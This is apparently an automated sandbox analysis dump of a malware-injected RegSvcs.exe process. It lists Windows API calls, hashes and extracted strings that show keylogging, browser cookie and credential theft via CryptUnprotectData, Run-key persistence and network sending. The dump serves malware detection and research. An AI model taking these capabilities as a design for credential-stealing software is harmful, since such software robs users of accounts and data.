                                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                    APIs
                                    • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                    • _free.LIBCMT ref: 004482D3
                                    • _free.LIBCMT ref: 004482FA
                                    • SetLastError.KERNEL32(00000000), ref: 00448307
                                    • SetLastError.KERNEL32(00000000), ref: 00448310
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                    • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                    APIs
                                    • _free.LIBCMT ref: 004509D4
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 004509E6
                                    • _free.LIBCMT ref: 004509F8
                                    • _free.LIBCMT ref: 00450A0A
                                    • _free.LIBCMT ref: 00450A1C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                    APIs
                                    • _free.LIBCMT ref: 00444066
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00444078
                                    • _free.LIBCMT ref: 0044408B
                                    • _free.LIBCMT ref: 0044409C
                                    • _free.LIBCMT ref: 004440AD
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                    • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                    • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                    • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: !D@$NG
                                    • API String ID: 180926312-2721294649
                                    • Opcode ID: 068e9cc0715a92df8d739c6ab064f289f55cbcf881b4b95b9b6ab27274b13f38
                                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                    • Opcode Fuzzy Hash: 068e9cc0715a92df8d739c6ab064f289f55cbcf881b4b95b9b6ab27274b13f38
                                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                    APIs
                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                                    • String ID: XQG$NG$PG
                                    • API String ID: 1634807452-3565412412
                                    • Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                                    • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                    • Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                                    • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: `#D$`#D
                                    • API String ID: 885266447-2450397995
                                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000104), ref: 00443475
                                    • _free.LIBCMT ref: 00443540
                                    • _free.LIBCMT ref: 0044354A
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    • API String ID: 2506810119-4009286469
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                    • GetLastError.KERNEL32 ref: 0044B931
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                    • String ID: PkGNG
                                    • API String ID: 2456169464-263838557
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "$0NG
                                    • API String ID: 368326130-3219657780
                                    APIs
                                    • _wcslen.LIBCMT ref: 004162F5
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wcslen$CloseCreateValue
                                    • String ID: !D@$okmode$PG
                                    • API String ID: 3411444782-3370592832
                                    APIs
                                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                    Strings
                                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    APIs
                                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                    Strings
                                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                    • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                    • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTimewsprintf
                                    • String ID: Offline Keylogger Started
                                    • API String ID: 465354869-4114347211
                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                                    • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                                    • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTime$wsprintf
                                    • String ID: Online Keylogger Started
                                    • API String ID: 112202259-1258561607
                                    APIs
                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                    • API String ID: 481472006-3277280411
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 00404F81
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                    • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$EventLocalThreadTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 2532271599-1507639952
                                    APIs
                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: CryptUnprotectData$crypt32
                                    • API String ID: 2574300362-2380590389
                                    APIs
                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                    • GetLastError.KERNEL32 ref: 0044C296
                                    • __dosmaperr.LIBCMT ref: 0044C29D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastPointer__dosmaperr
                                    • String ID: PkGNG
                                    • API String ID: 2336955059-263838557
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection Timeout
                                    • API String ID: 2055531096-499159329
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    APIs
                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                    • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FormatFreeLocalMessage
                                    • String ID: @J@$PkGNG
                                    • API String ID: 1427518018-1416487119
                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,74DF37E0,?), ref: 0041384D
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,74DF37E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 1818849710-1051519024
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                    • String ID: bad locale name
                                    • API String ID: 3628047217-1405518554
                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                    • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                    • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Control Panel\Desktop
                                    • API String ID: 1818849710-27424756
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                    • ShowWindow.USER32(00000009), ref: 00416C61
                                    • SetForegroundWindow.USER32 ref: 00416C6D
                                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                    • String ID: !D@
                                    • API String ID: 3446828153-604454484
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: /C $cmd.exe$open
                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    Similarity
                                    • API ID: _free
                                    Strings
                                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                    APIs
                                      • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                      • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                    Similarity
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                    • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadSize
                                    APIs
                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                    Similarity
                                    • API ID: CloseHandleOpenProcess
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    APIs
                                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                    Similarity
                                    • API ID: MetricsSystem
                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                    Similarity
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                                    • GetLastError.KERNEL32 ref: 00449F2B
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide
                                    • String ID: PkGNG
                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 0040B797
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C12
                                    Similarity
                                    • API ID:
                                    • String ID: ACP$OCP
                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                    • GetLastError.KERNEL32 ref: 0044B804
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                    • GetLastError.KERNEL32 ref: 0044B716
                                    Similarity
